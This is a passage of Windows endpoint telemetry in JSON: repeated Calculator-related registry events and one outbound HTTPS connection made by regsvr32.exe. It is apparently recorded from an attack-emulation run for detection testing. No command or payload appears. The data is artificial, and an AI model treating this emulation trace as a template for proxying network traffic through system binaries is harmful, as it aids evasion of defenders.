"unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "destination_address": "151.101.48.133", - "destination_port": "443", - "event_type": "network", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50505", - "subtype": "outgoing", - "timestamp": 131883573238680000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": 